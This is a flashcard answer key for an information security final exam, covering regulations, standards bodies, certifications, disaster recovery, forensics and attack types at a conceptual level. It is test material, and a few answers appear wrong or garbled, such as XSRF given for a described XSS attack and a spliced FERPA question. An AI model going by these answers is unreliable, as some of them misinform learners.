Final Exam

Réussis tes devoirs et examens dès maintenant avec Quizwiz!

True or False? During a simulation test of a contingency plan, you must shut down the original system at the primary site for the duration.

False

True or False? Hijacking refers to the use of social engineering to obtain access credentials, such as usernames and passwords.

False

True or False? Mandatory vacations minimize risk by rotating employees among various systems or duties.

False

True or False? Operating systems remove data when a file is deleted.

False

True or False? Privacy is the process used to keep data private.

False

True or False? Regulatory compliance means complying with an organization's own policies, audits, culture, and standards.

False

True or False? Symantec offers vendor-neutral certifications as well as certifications for its product lines.

False

True or False? System infectors are viruses that attack document files containing embedded macro programming capabilities.

False

True or False? Testimonial evidence is often the most important evidence in court because it provides relevance for other types of evidence.

False

True or False? The (ISC)2 Certified Secure Software Lifecycle Professional (CSSLP) credential measures the knowledge and skills necessary for professionals involved in the process of authorizing and maintaining information systems.

False

True or False? The Family Educational Rights and Privacy Act (FERPA) requires that specific information security controls be implemented to protect student records.

False

True or False? The Gramm-Leach-Bliley Act (GLBA) applies to the financial activities of both consumers and privately held companies.

False

True or False? The Health Insurance Portability and Accountability Act (HIPAA) applies only to current mental and physical health information and payments.

False

True or False? The Health Insurance Portability and Accountability Act (HIPAA) replaced the Health Information Technology for Economic and Clinical Health (HITECH) Act.

False

True or False? The ISACA Certified in Risk and Information Systems Control (CRISC) certification targets security professionals who ensure that their organization satisfies IT governance requirements.

False

True or False? The International Electrotechnical Commission (IEC) develops standards, which cover both wired and wireless communication technologies, that are commonly adopted by member countries in the European Union (EU).

False

True or False? The International Organization for Standardization (ISO) publishes the IEEE 802 local area network (LAN)/metropolitan area network (MAN) standards family.

False

True or False? The International Standard Book Number (ISBN) is an Institute of Electrical and Electronics Engineers (IEEE) standard.

False

True or False? The Internet Engineering Task Force (IETF) request for comments (RFC) development process is conducted solely by scientists on the Internet Architecture Board (IAB).

False

True or False? The National Institute of Standards and Technology (NIST) is a nongovernmental organization whose goal is to develop and publish international standards.

False

True or False? The federal agencies that oversee Gramm-Leach-Bliley Act (GLBA) compliance may not act against the financial institutions that they regulate when those institutions violate GLBA.

False

True or False? The main goal of the California Consumer Privacy Act (CCPA) is to prevent details of data breaches from being shared with the public.

False

True or False? The main goal of the Gramm-Leach-Bliley Act (GLBA) is to protect investors from financial fraud.

False

True or False? The process of remediation makes sure all personnel are aware of and comply with an organization's policies.

False

True or False? The term "data owner" refers to the person or group that manages an IT infrastructure.

False

True or False? The waterfall software development model works well in very dynamic environments where requirements change and are often revisited.

False

True or False? Under the Payment Card Industry Data Security Standard (PCI DSS), the rules with which an organization must comply depend on which types of payment cards they accept.

False

True or False? When outsourcing operations to a cloud service provider, the client is responsible for determining the best fault tolerance implementations to meet the service level-agreement (SLA) availability requirements.

False

True or False? Worms operate by encrypting important files or even the entire storage device and making them inaccessible.

False

Antonio is responsible for tuning his organization's intrusion detection system. He notices that the system reports an intrusion alert each time that an administrator connects to a server using Secure Shell (SSH). What type of error is occurring? Remote administration error False positive error Clipping error False negative error

False positive error

Which of the following agencies is not involved in the Gramm-Leach-Bliley Act (GLBA) oversight process? Securities and Exchange Commission (SEC) Federal Trade Commission (FTC) Federal Deposit Insurance Corporation (FDIC) Federal Communications Commission (FCC)

Federal Communications Commission (FCC)

Erin is a system administrator for a U.S. federal government agency. What law contains guidance on how she may operate a federal information system? Family Educational Rights and Privacy Act (FERPA) Federal Information Security Management Act (FISMA) Gramm-Leach-Bliley Act (GLBA) Sarbanes-Oxley Act (SOX)

Federal Information Security Management Act (FISMA)

True or False? Classification scope determines what data to classify; classification process determines how to handle classified data.

True

True or False? Spyware does not use cookies.

False

True or False? Committee of Sponsoring Organizations (COSO) is a set of best practices for IT management.

False

True or False? CompTIA Security+ is an expert-level security certification.

False

True or False? Cyberterrorism is the use of online media and assets to harass individuals.

False

True or False? Change control is the management of changes to the configuration of a system.

True

What is the purpose of a disaster recovery plan (DRP)? To set the value of each business process or resource as it relates to how the entire organization operates To identify the critical needs to develop a business recovery plan To set the order or priority for restoring an organization's functions after a disruption To enable an organization to make critical decisions ahead of time so personnel can manage and review decisions without the urgency of an actual disaster

(A DRP enables an organization to make critical decisions ahead of time. That way, personnel can manage and review decisions without the urgency of an actual disaster. If these plans are not ready in advance, security professionals and managers will have to make best-guess decisions under huge pressure.)

Which of the following is not true of requests for comments (RFCs)? Only some RFCs specify standards. RFCs may be modified. RFCs may originate with organizations other than the Internet Engineering Task Force (IETF). A Proposed Standard is the initial official stage of an RFC that defines a formal standard.

(RFCs never change. Any change to an RFC gets a new number and becomes a new RFC.)

What file type is least likely to be impacted by a file infector virus? .exe .docx .com .dll

.docx

Susan performs a full backup of her server every Sunday at 1:00 a.m. and differential backups on Mondays through Fridays at 1:00 a.m. Her server fails at 9:00 a.m. on Wednesday. How many backups does Susan need to restore? 1 2 3 4

2

How many domains of knowledge are covered by the Certified Information Systems Security Professional (CISSP) exam? 7 8 9 10

8

True or False? Configuration changes can be made at any time during a system life cycle, and no process is required.

False

Devaki is a network engineer. She is diagnosing an issue with a small business customer's wireless local area network (WLAN). She knows the Institute of Electrical and Electronics Engineers (IEEE) has created the standards involved in various network technologies. While WLAN standards cover a wide array of subsets, which general standard does she need to consult that addresses all WLANs? 802.3 802.11 802.16 802.18

802.11

Mark is considering outsourcing security functions to a third-party service provider. What benefit is he most likely to achieve? Higher degree of privacy Access to a higher level of expertise Developing in-house talent Building internal knowledge

Access to a higher level of expertise

Hajar is responsible for keeping her banking institution's servers operating 24/7/365. Her recovery strategy is to have fully redundant or duplicate operations and synchronized data and to operate the site continuously. Which strategy has she selected? Alternate processing center or mirrored site Hot site Mobile site Warm site

Alternate processing center or mirrored site

Under the Federal Information Security Management Act (FISMA) of 2002, which of the following broadens the scope of FISMA beyond a federal agency and is important because IT systems and functions are often outsourced? The Office of Management and Budget (OMB) is responsible for FISMA compliance. An agency must protect the IT systems that support its operations even if another agency or contractor owns the IT systems. FISMA requires each federal agency to create an agency-wide information security program. Agencies must test and evaluate the security program at least annually and test IT systems with greater risk more often.

An agency must protect the IT systems that support its operations even if another agency or contractor owns the IT systems.

What is not a privacy principle created by the Organisation for Economic Co-operation and Development (OECD)? An organization should collect only what it needs. An organization should share its information. An organization should keep its information up to date. An organization should properly destroy its information when it is no longer needed.

An organization should share its information.

In the Open Systems Interconnection (OSI) Reference Model, which layer has the user interface that displays information to the user? Application Presentation Session Transport

Application

Mary is designing a software component that will function at the Presentation Layer of the Open Systems Interconnection (OSI) Reference Model. What other two layers of the model will her component need to interact with? Network and Session Session and Transport Application and Session Application and Transport

Application and Session

In what area does the Internet Architecture Board (IAB) provide oversight on behalf of the Internet Engineering Task Force (IETF)? Architecture for Internet protocols and procedures Strengthening the U.S. marketplace within the global economy Developing alternate methods used to document operational specifications Subject matter expertise on routing and switching

Architecture for Internet protocols and procedures

Jiang is pursuing a career in information security. He wants to eventually achieve the (ISC)2 Certified Information Systems Security Professional (CISSP) certification but does not have the required experience. If he passes the CISSP exam now, which credential will Jiang get? CISSP-ISSAP Systems Security Certified Practitioner (SSCP) Certified Cloud Security Professional (CCSP) Associate of (ISC)2

Associate of (ISC)2

In an accreditation process, who has the authority to approve a system for implementation? Certifier Authorizing official (AO) System owner System administrator

Authorizing official (AO)

Lin is creating a template for the configuration of Windows servers in her organization. The configuration includes the basic security settings that should apply to all systems. What type of document should she create? Baseline Policy Guideline Procedure

Baseline

Takako is a security engineer for her company's IT department. She has been tasked with developing a security monitoring system for the company's infrastructure to determine when any network activity occurs outside the norm. What essential technique does she start with? Alarms Baselines Covert acts Intrusion detection system (IDS)

Baselines

Tonya would like to protect her users and the network when users browse to known dangerous sites. She plans to maintain a list of those sites and drop messages from those websites. What type of approach is Tonya advocating? Blacklisting Change detection Integrity checking Whitelisting

Blacklisting

Joe is the Chief Executive Officer (CEO) of a company that handles medical billing for several regional hospital systems. How would Joe's company be classified under the Health Insurance Portability and Accountability Act (HIPAA)? Covered entity as a health plan Covered entity as a health care clearinghouse Covered entity as a provider Business associate of a covered entity

Business associate of a covered entity

Hajar has been an (ISC)2 Certified Information Systems Security Professional (CISSP) for 10 years. She would like to earn an advanced certification that demonstrates her ability in systems security engineering. Which of the following CISSP concentrations would meet Hajar's needs? CISSP-ISASP CISSP-ISSEP CISSP-ISSMP CISSP-ISSAP

CISSP-ISSEP

Arturo is leading a project to commission a new information system that will be used by a U.S. federal government agency. The agency uses the risk management framework (RMF) approach for Federal Information Security Management Act (FISMA) compliance. He is working with his team to assess and document agency IT systems based on risk. What step of the risk management framework is Arturo completing? Implement security controls in IT systems Assess security controls for effectiveness Categorize information systems Continuously monitor security controls

Categorize information systems

Richard would like to earn a certification that demonstrates his ability to manage enterprise security programs. What certification would be most appropriate for Richard? Certified Information Security Manager (CISM) Certified Information Systems Auditor (CISA) Certified in the Governance of Enterprise IT (CGEIT) Certified in Risk and Information Systems Control (CRISC)

Certified Information Security Manager (CISM)

Jim is an experienced security professional who recently accepted a position in an organization that uses Check Point firewalls. What certification can Jim earn to demonstrate his ability to administer these devices? Certified Information Systems Security Professional (CISSP) Cisco Certified Internetwork Expert (CCIE) Security+ Check Point Certified Security Administrator (CCSA)

Check Point Certified Security Administrator (CCSA)

Betty visits a local library with her young children. She notices that someone using a computer terminal in the library is visiting pornographic websites. What law requires that the library filter offensive web content for minors? Children's Online Privacy Protection Act (COPPA) Sarbanes-Oxley Act (SOX) Family Educational Rights and Privacy Act (FERPA) Children's Internet Protection Act (CIPA)

Children's Internet Protection Act (CIPA)

Oscar is a network engineer. He is responsible for the networks and security protections, such as firewalls, in his local government agency. He is beginning a professional development journey and trying to determine an entry-level or associate-level security certification that is a good match with his current knowledge and skills. Which certification should he pursue? Cisco Certified Network Associate (CCNA) Juniper Networks Certified Internet Professional (JNCIP)-Enterprise Administration of Symantec Security Analytics Check Point Certified Security Administrator (CCSA)

Cisco Certified Network Associate (CCNA)

Which method of fault tolerance connects two or more computers to act like a single computer in a highly coordinated manner? Redundant Array of Inexpensive Disks (RAID) Clustering Load balancing Outsourcing to the cloud

Clustering

Rylie is a newly hired cybersecurity expert for a government agency. Rylie used to work in the private sector. She has discovered that, whereas private sector companies often had confusing hierarchies for data classification, the government's classifications are well known and standardized. As part of her training, she is researching data that requires special authorization beyond normal classification. What is this type of data called? Compartmentalized Assured Public Exclusive

Compartmentalized

Which principle of effective digital forensic investigations helps to ensure data in memory is not lost? Minimize original data handling Enforce the rules of evidence Do not exceed your knowledge Consider data volatility

Consider data volatility

Which of the following should you avoid during a disaster and recovery? Continue normal processes, such as separation of duties or spending limits If a number of systems are down, provide additional guidance or support to users Combine services that were on different hardware platforms onto common servers to speed up recovery While running at the alternate site, continue to make backups of data and systems

Continue normal processes, such as separation of duties or spending limits (It is better to suspend normal processes, such as separation of duties or spending limits. Compensate with additional controls or by additional auditing. The disaster recovery plan (DRP) should give added privileges or spending authority to certain people or for certain tasks.)

Donnelly is an IT specialist. He is in charge of the server and network appliances inventory. The infrastructure roadmap calls for a network systems reconfiguration in the next six months. Adina, the security expert, asks Donnelly to prepare a standardized list of all current and proposed equipment and then to present it to her in a hardware configuration chart. What does Adina tell Donnelly that the chart should include? Change control management Copies of all software configurations for routers and switches Impact assessment System life cycle

Copies of all software configurations for routers and switches

Maya is creating a computing infrastructure compliant with the Payment Card Industry Data Security Standard (PCI DSS). What type of information is she most likely trying to protect? Health records Credit card information Educational records Trade secrets

Credit card information

Applications represent the most common avenue for users, customers, and attackers to access data, which means you must build the software to enforce the security policy and to ensure compliance with regulations, including the privacy and integrity of both data and system processes. Regardless of the development model, the application must validate all input. Certain attacks can take advantage of weak validation. One such attack provides script code that causes a trusted user who views the input script to send malicious commands to a web server. What is this called? Cross-site scripting (XSS) Cross-site request forgery (XSRF) Distributed denial of service (DDoS) Structured Query Language (SQL) injection

Cross-site request forgery (XSRF)

Larry recently viewed an auction listing on a website. As a result, his computer executed code that popped up a window that asked for his password. What type of attack has Larry likely encountered? Structured Query Language (SQL) injection Command injection Extensible Markup Language (XML) injection Cross-site scripting (XSS)

Cross-site scripting (XSS)

What program, released in 2013, is an example of ransomware? BitLocker CryptoLocker FileVault CryptoVault

CryptoLocker

Which element is not a core component of the ISO 27002 standard? Risk assessment Cryptography Asset management Access control

Cryptography

Alan withdraws cash from an ATM belonging to Bank X that is coming from his account with Bank Y. What is Alan's relationship with Bank X? Customer Covered entity Nonaffiliated third party Consumer

Customer

Alan withdraws cash from an ATM belonging to Bank X that is coming from his account with Bank Y. What is Alan's relationship with Bank Y? Customer Covered entity Nonaffiliated third party Consumer

Customer

Which type of computer crime often involves nation-state attacks by well-funded cybercriminals? Cyberstalking Cyberterrorism Online fraud Identity theft

Cyberterrorism

Juan is an experienced information security professional. He has spent a lot of time evaluating computers for evidence of criminal or malicious activity as well as recovering data. Which Global Information Assurance Certification (GIAC) credential focus area is most likely to have certifications that are a good fit for Juan's skills and knowledge? Management, Legal, and Audit Industrial Control Systems Digital Forensics & Incident Response Cloud Security

Digital Forensics & Incident Response

Which of the following is not true of U.S. Department of Defense/military Directive (DoDD) 8140? DoDD 8140 includes training and certification in cybersecurity to prepare Department of Defense (DoD) personnel to meet the demands of cyberwarfare. DoDD 8140 is more role based than the 8570.01 directive. DoDD 8140 is an operationally focused cybersecurity training framework. DoDD 8140 certifications are unique and will not include commercial certifications.

DoDD 8140 certifications are unique and will not include commercial certifications.

Which type of evidence is stored in a computer's memory, as well as on storage devices as in files, and must be accompanied by documentation that validates the evidence's authenticity? Real Documentary Testimonial Demonstrative

Documentary

Lin is conducting an audit of an identity management system. Which question is not likely to be in the scope of her audit? Does the organization have an effective password policy? Does the firewall properly block unsolicited network connection attempts? Who grants approval for access requests? Is the password policy uniformly enforced?

Does the firewall properly block unsolicited network connection attempts?

Which document is the Internet Engineering Task Force (IETF) request for comments (RFC) second stage, after participants have demonstrated that the standard has been deployed in working environments? Proposed Standard (PS) Draft Standard (DS) Standard (STD) Best Current Practice (BCP)

Draft Standard (DS)

Omar is an infrastructure security professional. After reviewing a set of professional ethics issued by his company, he is learning and adopting ethical boundaries in an attempt to demonstrate them to others. What is this called? Encouraging the adoption of ethical guidelines and standards Informing users through security awareness training Communicating the freedom to access all system resources Understanding common assumptions that lead computer users to unethical behavior

Encouraging the adoption of ethical guidelines and standards

Which technology category would not likely be the subject of a standard published by the International Electrotechnical Commission (IEC)? Semiconductors Solar energy Encryption Consumer appliances

Encryption

Tonya is working with a team of subject matter experts to diagnose a problem with her system. The experts determine that the problem likely resides at the Transport Layer of the Open Systems Interconnection (OSI) model. Which functionality is the most likely suspect? Process-to-process communication End-to-end communication maintenance Routing Signaling

End-to-end communication maintenance (The Transport Layer (Layer 4) provides error-free communications across a network as well as the connections needed by software functions in the Session Layer (Layer 5). In addition, it calls functions in the Network Layer (Layer 3), the next layer down, to send and receive packets that comprise the contents of the network communication.)

Which of the following is least likely to be needed when rebuilding systems that were damaged during a disaster? Updating operating systems and applications with the most current patches Restoring data to the recovery point objective (RPO) Ensuring there are adequate operating system licenses Activating access control rules, directories, and remote access systems to permit users to get on the new systems

Ensuring there are adequate operating system licenses

Which organization creates information security standards that specifically apply within the European Union (EU)? International Telecommunication Union (ITU) American National Standards Institute (ANSI) European Telecommunications Standards Institute (ETSI) Cyber Security Technical Committee (TC CYBER) Institute of Electrical and Electronics Engineers (IEEE)

European Telecommunications Standards Institute (ETSI) Cyber Security Technical Committee (TC CYBER)

Biyu is a network administrator. She is developing the compliance aspect of her company's security policy. Currently, she is focused on the records of actions that the organization's operating system or application software creates. What aspect of compliance is Biyu focusing on? Certification Event logs Professional ethics Remediation

Event logs

True or False? A business impact analysis (BIA) details the steps to recover from a disruption and restore the infrastructure necessary for normal business operations.

False

True or False? A port-scanning tool enables an attacker to escalate privileges on a network server.

False

True or False? A smurf attack tricks users into providing logon information on what appears to be a legitimate website but is in fact a website set up by an attacker to obtain this information.

False

True or False? A website designer seeking guidance on how to incorporate Simple Object Access Protocol (SOAP) and Extensible Markup Language (XML) would most likely consult Internet Engineering Task Force (IETF) requests for comments (RFCs).

False

True or False? All types of disaster recovery sites are available in the cloud.

False

True or False? Change does not create risk for a business.

False

True or False? Clustering comprises multiple disk drives that appear as a single disk drive but actually store multiple copies of data in case a disk drive in the array fails.

False

Bob is preparing to dispose of magnetic media and wishes to destroy the data stored on it. Which method is not a good approach for destroying data? Formatting Degaussing Physical destruction Repeatedly overwriting data

Formatting

Antivirus, firewall, and email use policies belong to what part of a security policy hierarchy? Environment Functional policies in support of organization policy Organizational security policy Supporting mechanisms

Functional policies in support of organization policy

Lin works for a large financial institution. She has been asked to create a written information security program, which must state how the institution collects and uses customer data and must describe the controls used to protect that data. She is also in charge of running the program, conducting a risk assessment to identify risks to customer information, and assessing current safeguards to make sure they are effective, among other tasks. Which of the following is she trying to comply with? Gramm-Leach-Bliley Act (GLBA) Privacy Rule GLBA Safeguards Rule Sarbanes-Oxley Act (SOX) certification requirements Payment Card Industry Data Security Standard (PCI DSS)

GLBA Safeguards Rule (The Safeguards Rule requires a financial institution to create a written information security program, assign someone to run the program, conduct a risk assessment, assess safeguards, and design and implement safeguards to control risks. The rule requires financial institutions to have programs that are a good fit for their size and complexity and are suitable for the sensitivity of the customer data that the institution uses.)

Devaki is a new compliance manager. She is reading about various regulations to determine which ones apply to her industry. What law applies specifically to consumer data that originates in Europe? Health Insurance Portability and Accountability Act (HIPAA) Sarbanes-Oxley Act (SOX) Payment Card Industry Data Security Standard (PCI DSS) General Data Protection Regulation (GDPR)

General Data Protection Regulation (GDPR)

Which of the following is a unit of measure that represents frequency and is expressed as the number of cycles per second? Power Weber Gauss Hertz

Hertz

What type of system is intentionally exposed to attackers in an attempt to lure them out? Honeypot Bastion host Web server Database server

Honeypot

Gary is troubleshooting a security issue on an Ethernet network. He would like to look at the relevant Ethernet standard. What publication should he seek out? NIST 800-53 IEEE 802.3 ANSI X.1199 ISO 17799

IEEE 802.3

Juan comes across documentation from his organization related to several information security initiatives using different standards as their reference. Which International Organization for Standardization (ISO) standard provides current guidance on information security management? ISO 17799 ISO 9000 ISO 27002 ISO 14001

ISO 27002

What is a set of concepts and policies for managing IT infrastructure, development, and operations? The information is published in a series of books, each covering a separate IT management topic. ISO 27002 Control Objectives for Information and Related Technology (COBIT) IT Infrastructure Library (ITIL) National Institute of Standards and Technology (NIST) Cybersecurity Framework (CSF)

IT Infrastructure Library (ITIL)

During which step of the incident-handling process does triage take place? Identification Notification Response Recovery and follow-up

Identification

Tim is implementing a set of controls designed to ensure that financial reports, records, and data are accurately maintained. What information security goal(s) is Tim attempting to achieve? Integrity Integrity and availability Availability Confidentiality

Integrity

Fran is interested in learning more about the popular Certified Ethical Hacker (CEH) credential. What organization should she contact? High Tech Crime Network International Council of E-Commerce Consultants (EC-Council) Software Engineering Institute—Carnegie Mellon University The International Society of Forensic Computer Examiners

International Council of E-Commerce Consultants (EC-Council)

Maria is working on the definition and application of the terms gauss, hertz, and weber. Which standards source should she consult? International Electrotechnical Commission (IEC) International Telecommunication Union Telecommunication Sector (ITU-T) World Wide Web Consortium (W3C) Internet Engineering Task Force (IETF)

International Electrotechnical Commission (IEC)

Bill is conducting an analysis of a new IT service. He would like to assess it using the Open Systems Interconnection (OSI) Reference Model and would like to learn more about this framework. What organization should he turn to for the official definition of OSI? Ocean Surveillance Information System (OSIS) International Organization for Standardization (ISO) National Institute of Standards and Technology (NIST) Information Systems Audit and Control Association (ISACA)

International Organization for Standardization (ISO)

Which organization promotes technology issues as an agency of the United Nations? International Telecommunication Union (ITU) Institute of Electrical and Electronics Engineers (IEEE) American National Standards Institute (ANSI) Internet Assigned Numbers Authority (IANA)

International Telecommunication Union (ITU)

Yolanda would like to prevent attackers from using her network as a relay point for a smurf attack. What protocol should she filter? Hypertext Transfer Protocol (HTTP) Transmission Control Protocol (TCP) Internet Control Message Protocol (ICMP) User Datagram Protocol (UDP)

Internet Control Message Protocol (ICMP)

Rodrigo has just received an email at work from an unknown person. The sender claims to have incriminating evidence against Rodrigo and threatens to release it to his employer and his family unless he discloses certain confidential information about his employer's company. Rodrigo does not know that several other people in the organization received the same email. What form of social engineering has occurred? Intimidation Name dropping Appeal for help Phishing

Intimidation

Which of the following is not true of data backup options? A full backup copies everything to backup media. A differential backup starts with making a full backup; successive backups back up changes made since the last full backup. An incremental backup starts with a full backup; successive backups back up only that day's changes. It is faster to create differential weekday backups than incremental backups.

It is faster to create differential weekday backups than incremental backups.

Which term describes a process that requires an organization to preserve and not alter evidence that may be used in court? This process can help ensure that normal data-handling procedures do not contaminate or even delete data that may be needed for a case. Legal hold E-discovery Admissibility Hash function

Legal hold

What is the average time a device will function before it fails? Recovery time objective (RTO) Recovery point objective (RPO) Mean time to failure (MTTF) Mean time between failures (MTBF)

Mean time to failure (MTTF)

Alison is a security professional. A user reports that, after opening an email attachment, every document he saves is in a template format and other Microsoft Word documents will not open. After investigating the issue, Alison determines that the user's Microsoft Office normal.dot template has been damaged, as well as many Word files. What type of virus is the most likely cause? Polymorphic virus Retro virus Cross-platform virus Macro virus

Macro virus

Taylor is a security professional working for a retail company. She is revising the company's policies and procedures to meet Payment Card Industry Data Security Standard (PCI DSS) objectives. One change she has made is to require the use of antivirus software on all systems commonly affected by malware and to keep them regularly updated. Which PCI DSS control objective is she attempting to meet? Build and maintain a secure network Protect cardholder data Maintain a vulnerability management program Implement strong access control measures

Maintain a vulnerability management program

Isabella is a digital forensic specialist. She wants to recover deleted data from a computer disk. The computer is currently running. Which process should she take to do so without accidentally overwriting any deleted data? Copy the contents of the disk drive to an external drive without shutting down the computer Shut down the computer, reboot, and then copy the contents of the disk drive to an external drive Make an image of memory, shut down the computer, attach the disk drive to a forensic lab device, and read the data from the disk Because processes constantly run on computers and request new sectors to store data, it is not possible to recover deleted data without some data being overwritten

Make an image of memory, shut down the computer, attach the disk drive to a forensic lab device, and read the data from the disk`

When should an organization's managers have an opportunity to respond to the findings in an audit? Managers should write a report after receiving the final audit report. Managers have the opportunity to respond to a draft copy of the audit report. Auditors then put that response in the final report. Managers should not have an opportunity to respond to audit findings. Managers should write a letter to the Board following receipt of the audit report.

Managers have the opportunity to respond to a draft copy of the audit report. Auditors then put that response in the final report.

Alison retrieved data from a company database containing personal information on customers. When she looks at the Social Security number (SSN) field, she sees values that look like this: "XXX-XX-9142." What has happened to these records? Encryption Truncation Hashing Masking

Masking (Organizations typically implement role-based access control mechanisms in their applications to ensure the confidentiality of sensitive data. Masking is used to "X out" pertinent characters of sensitive data.)

Isabella is an IT security manager for a state agency. The agency can survive for nine hours without a functioning data center. If the power goes out in her data center, Isabella estimates it will take six hours to move data center operations to an alternate site. Which of the following describes how long the agency can survive without a functioning data center? Critical business function (CBF) Maximum tolerable downtime (MTD) Recovery time objective (RTO) Recovery point objective (RPO)

Maximum tolerable downtime (MTD)

Which agreement type is typically less formal than other agreements and expresses areas of common interest? Service-level agreement (SLA) Blanket purchase agreement (BPA) Memorandum of understanding (MOU) Interconnection security agreement (ISA)

Memorandum of understanding (MOU)

Which of the following is not true of mobile devices and forensics? Mobile devices can be volatile and remotely managed. Mobile devices do not need to follow ordinary chain of custody techniques. Although options are available for breaking mobile device access controls, there is no guarantee that you will be able to access the device's data without the owner's cooperation. The process of accessing evidence on a mobile device is similar to that on a normal computer.

Mobile devices do not need to follow ordinary chain of custody techniques.

Arturo discovers a virus on his system that resides only in the computer's memory and not in a file. What type of virus has he discovered? Slow virus Retro virus Cross-platform virus Multipartite virus

Multipartite virus

What U.S. federal government agency is charged with the responsibility of creating information security standards and guidelines for use within the federal government and more broadly across industries? Office of Management and Budget (OMB) Department of Defense (DoD) National Institute of Standards and Technology (NIST) Department of Homeland Security (DHS)

National Institute of Standards and Technology (NIST)

Which of the following is a U.S. federal agency within the Department of Commerce that provides standards for measurement and technology on which nearly all computing devices rely? Institute of Electrical and Electronics Engineers (IEEE) American National Standards Institute (ANSI) World Wide Web Consortium (W3C) National Institute of Standards and Technology (NIST)

National Institute of Standards and Technology (NIST)

Hajar is a network engineer. She is creating a system of access involving clearance and classification based on users and the objects they need in a secure network. She is restricting access to secure objects by users based on least privilege and which of the following? Job rotation Security awareness Need to know Separation of duties

Need to know

In which type of computer crime do cybercriminals engage in activities to either impersonate victims or to convince victims to carry out transactions that benefit the criminals, with a focus on extracting revenue from victims? Cyberstalking Exfiltrating data Online fraud Nonaccess computer crime

Online fraud

Janette is the director of her company's network infrastructure group. She is explaining to the business owners the advantages and disadvantages of outsourcing network security. One consideration she presents is the question of who would be responsible for the data, media, and infrastructure. What consideration is she describing? Adherence to policy Ownership Privacy Risk

Ownership

A computing device does not play which role in a crime? Perpetrator Target Instrument Repository

Perpetrator

During which step of the incident-handling process do you develop a formal communication plan and identify all key stakeholders? Preparation Identification Notification Documentation

Preparation

Marguerite is creating a budget for a software development project. What phase of the system life cycle is she undertaking? Project initiation and planning Functional requirements and definition System design specification Operations and maintenance

Project initiation and planning

Christopher is designing a security policy for his mid-size company. He would like to use an approach that allows a reasonable list of activities but prohibits all other activities. Which level of permission is he planning to use? Promiscuous Permissive Prudent Paranoid

Prudent

What type of organizations are required to comply with the Sarbanes-Oxley Act (SOX)? Nonprofit organizations Publicly traded companies Government agencies Privately held companies

Publicly traded companies

What is the least likely goal of an information security awareness program? Teach users about security objectives Inform users about trends and threats in security Motivate users to comply with security policy Punish users who violate policy

Punish users who violate policy

Which data source comes first in the order of volatility when conducting a forensic investigation? Logs Files on disk Swap and paging files Random access memory (RAM)

Random access memory (RAM)

Which type of evidence is any physical object that you can touch or otherwise directly observe, such as a hard drive? Real Documentary Testimonial Demonstrative

Real

Arturo is an IT manager for a school district. He is planning recovery options for a small data center that supports teacher and classroom activities for 5 of the 21 schools in his district. Many school districts in his state use similar classroom technology. Arturo is looking for a temporary alternate site that would be easy to cut over to and is affordable. Which option is most likely to fit Arturo's needs? Reciprocal agreement with another school district Reciprocal center Contingency carrie

Reciprocal agreement with another school district

During which step of the incident-handling process should a lessons-learned review of the incident be conducted? Notification Response Recovery and follow-up Documentation

Recovery and follow-up

Isabella is an IT security manager for a state agency. The agency can survive for nine hours without a functioning data center. The power goes out in her data center. It takes six hours to move data center operations to an alternate site. Which of the following describes the time it takes for the move? Critical business function (CBF) Mean time to failure (MTTF) Recovery time objective (RTO) Recovery point objective (RPO)

Recovery time objective (RTO)

Karen is a hacker. She wants to access a server and control it remotely. The tool she plans to use is a type of Trojan. What tool will Karen use for this purpose? Ping Simple Network Management Protocol (SNMP) agent Network mapper (Nmap) Remote Access Tool (RAT)

Remote Access Tool (RAT)

What is the correct order of change control procedures regarding changes to systems and networks? Request, approval, impact assessment, build/test, monitor, implement Request, impact assessment, approval, build/test, implement, monitor Request, approval, impact assessment, build/test, implement, monitor Request, impact assessment, approval, build/test, monitor, implement

Request, impact assessment, approval, build/test, implement, monitor

During which step of the incident-handling process is the goal to contain the incident? Identification Notification Response Recovery and follow-up

Response

Which of the following is not one of the rigRight to consent to data releasehts afforded to students (or the parents of a minor student) under the Family Educational Rights and Privacy Act (FERPA)? Right to inspect student records Right to request correction of errors Right to delete unwanted information from records Right to consent to data release

Right to delete unwanted information from records

Which of the following does not need to comply with the Family Educational Rights and Privacy Act (FERPA)? Schools that do not receive federal funds State and local educational agencies Public colleges and universities Primary and secondary schools

Schools that do not receive federal funds

Aditya is a network technician. He is collecting system data for an upcoming internal system audit. He is currently performing vulnerability testing to determine what weaknesses may exist in the network's security. What form of assessment is he conducting? Checklists Observation Security testing Configuration review

Security testing

Aditya is attempting to classify information regarding a new project that his organization will undertake in secret. Which characteristic is not normally used to make these types of classification decisions? Value Sensitivity Criticality Threat

Sensitivity or Criticality or Threat (The three criteria normally used to make classification decisions are value, sensitivity, and criticality.)

Mia is her company's network security professional. She is developing access policies based on personnel security principles. As part of this effort, she is devising a method of taking high-security tasks and splitting them among several different employees so that no one person is responsible for knowing and performing the entire task. What practice is she developing? Job rotation Limiting access Mandatory vacations Separation of duties

Separation of duties

Devaki is investigating an attack. An intruder managed to take over the identity of a user who was legitimately logged in to Devaki's company's website by manipulating Hypertext Transfer Protocol (HTTP) headers. Which type of attack likely took place? Session hijacking Extensible Markup Language (XML) injection Cross-site scripting (XSS) Structured Query Language (SQL) injection

Session hijacking

Which intrusion detection system strategy relies on pattern matching? Behavior detection Traffic-based detection Statistical detection Signature detection

Signature detection

Which of the following items would generally not be considered personally identifiable information (PII)? First and last name Driver's license number Biometric data Social media post

Social media post

The chief executive officer (CEO) of a company recently fell victim to an attack. The attackers sent the CEO an email that appeared to come from the company's attorney. The email informed the CEO that his company was being sued and he needed to view a subpoena at a court website. When visiting the website, malicious code was downloaded onto the CEO's computer. What type of attack took place? Spear phishing Pharming Ransomware Command injection

Spear phishing

What type of attack occurs in real time and is often conducted against a specific target? Unstructured Structured Direct Indirect

Structured

Bob is developing a web application that depends on a backend database. What type of attack could a malicious individual use to send commands through his web application to the database? Cross-site scripting (XSS) Extensible Markup Language (XML) injection Structured Query Language (SQL) injection Lightweight Directory Access Protocol (LDAP) injection

Structured Query Language (SQL) injection

Carl has assembled a team of representatives from each department to test a new business continuity plan (BCP). During the test, the representatives meet in a room and review many aspects of the plan, such as the goals, scope, assumptions, and the structure of the organization. They also conduct scenario-based exercises as though they are executing the plan for a certain type of incident to find errors, such as gaps or overlaps. What type of plan is being conducted? Checklist Structured walk-through

Structured walk-through

Joe is responsible for the security of the systems that control and monitor devices for a power plant. What type of system does Joe likely administer? Supervisory Control and Data Acquisition (SCADA) Embedded robotic systems Mobile fleet Mainframe

Supervisory Control and Data Acquisition (SCADA)

Which of the following is a type of denial of service (DoS) attack? Logic bomb Synchronize (SYN) flood Cross-site scripting (XSS) Structured Query Language (SQL) injection

Synchronize (SYN) flood

